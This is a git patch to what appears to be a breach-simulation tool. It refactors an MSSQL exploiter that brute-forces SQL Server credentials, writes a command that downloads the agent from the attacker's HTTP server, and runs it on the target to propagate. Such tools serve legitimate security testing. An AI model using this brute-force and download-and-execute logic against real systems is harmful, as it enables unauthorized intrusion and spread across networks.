From 50a8bf8f4acd3764132b909ae8163cdef4d6e2d8 Mon Sep 17 00:00:00 2001 From: vakarisz Date: Mon, 14 Mar 2022 12:11:28 +0200 Subject: [PATCH] Agent: Refactor mssqlexec.py to fit the new puppet infrastructure --- monkey/infection_monkey/exploit/mssqlexec.py | 57 +++++++++++-------- .../exploit/tools/http_tools.py | 4 +- 2 files changed, 35 insertions(+), 26 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index a3b6d8191..6247f3779 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -5,13 +5,17 @@ from time import sleep import pymssql +from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.utils.exceptions import ExploitingVulnerableMachineError, FailedExploitationError from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_monkey_dest_path -from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer +from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, try_get_target_monkey +from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload +from infection_monkey.i_puppet import ExploiterResultData from infection_monkey.model import DROPPER_ARG +from infection_monkey.transport import LockedHTTPServer +from infection_monkey.utils.brute_force import generate_identity_secret_pairs from infection_monkey.utils.commands import build_monkey_commandline logger = logging.getLogger(__name__) @@ -42,25 +46,26 @@ class MSSQLExploiter(HostExploiter): "DownloadFile(^'{http_path}^' , ^'{dst_path}^')" ) - def __init__(self, host): - super(MSSQLExploiter, self).__init__(host) + def __init__(self): + super().__init__() self.cursor = None - self.monkey_server = None + self.agent_http_path = None self.payload_file_path = os.path.join( MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME ) - def _exploit_host(self): + def _exploit_host(self) -> ExploiterResultData: """ First this method brute forces to get the mssql connection (cursor). Also, don't forget to start_monkey_server() before self.upload_monkey() and self.stop_monkey_server() after """ # Brute force to get connection - username_passwords_pairs_list = self._config.get_exploit_user_password_pairs() - self.cursor = self.brute_force( - self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list + creds = generate_identity_secret_pairs( + self.options["credentials"]["exploit_user_list"], + self.options["credentials"]["exploit_password_list"], ) + self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds) # Create dir for payload self.create_temp_dir() @@ -68,9 +73,9 @@ class MSSQLExploiter(HostExploiter): try: self.create_empty_payload_file() - self.start_monkey_server() + http_thread = self.start_monkey_server() self.upload_monkey() - self.stop_monkey_server() + MSSQLExploiter._stop_monkey_server(http_thread) # Clear payload to pass in another command self.create_empty_payload_file() @@ -81,7 +86,8 @@ class MSSQLExploiter(HostExploiter): except Exception as e: raise ExploitingVulnerableMachineError(e.args).with_traceback(sys.exc_info()[2]) - return True + self.exploit_result.propagation_success = True + return self.exploit_result def run_payload_file(self): file_running_command = MSSQLLimitedSizePayload(self.payload_file_path) @@ -132,12 +138,17 @@ class MSSQLExploiter(HostExploiter): ) self.run_mssql_command(tmp_dir_removal_command) - def start_monkey_server(self): - self.monkey_server = MonkeyHTTPServer(self.host) - self.monkey_server.start() + def start_monkey_server(self) -> LockedHTTPServer: + monkey_src = try_get_target_monkey(self.host) + self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( + self.host, monkey_src, self.agent_repository + ) + return http_thread - def stop_monkey_server(self): - self.monkey_server.stop() + @staticmethod + def _stop_monkey_server(http_thread): + http_thread.stop() + http_thread.join(LONG_REQUEST_TIMEOUT) def write_download_command_to_payload(self): monkey_download_command = self.get_monkey_download_command() @@ -145,9 +156,9 @@ class MSSQLExploiter(HostExploiter): return monkey_download_command def get_monkey_launch_command(self): - dst_path = get_monkey_dest_path(self.monkey_server.http_path) + dst_path = get_monkey_dest_path(self.agent_http_path) # Form monkey's launch command - monkey_args = build_monkey_commandline(self.host, get_monkey_depth() - 1, dst_path) + monkey_args = build_monkey_commandline(self.host, self.current_depth - 1, dst_path) suffix = ">>{}".format(self.payload_file_path) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX return MSSQLLimitedSizePayload( @@ -157,9 +168,9 @@ class MSSQLExploiter(HostExploiter): ) def get_monkey_download_command(self): - dst_path = get_monkey_dest_path(self.monkey_server.http_path) + dst_path = get_monkey_dest_path(self.agent_http_path) monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( - http_path=self.monkey_server.http_path, dst_path=dst_path + http_path=self.agent_http_path, dst_path=dst_path ) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format( @@ -194,9 +205,9 @@ class MSSQLExploiter(HostExploiter): host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT ) logger.info( - "Successfully connected to host: {0}, using user: {1}, password (" - "SHA-512): {2}".format(host, user, self._config.hash_sensitive_data(password)) + f"Successfully connected to host: {host} using user: {user} and password" ) + self.exploit_result.exploitation_success = True self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) self.report_login_attempt(True, user, password) cursor = conn.cursor() diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py index 467539180..43d62862f 100644 --- a/monkey/infection_monkey/exploit/tools/http_tools.py +++ b/monkey/infection_monkey/exploit/tools/http_tools.py @@ -1,6 +1,4 @@ import logging -import os -import os.path import urllib.error import urllib.parse import urllib.request @@ -30,7 +28,7 @@ class HTTPTools(object): @staticmethod def create_locked_transfer( host, dropper_target_path, agent_repository, local_ip=None, local_port=None - ): + ) -> LockedHTTPServer: """ Create http server for file transfer with a lock :param host: Variable with target's information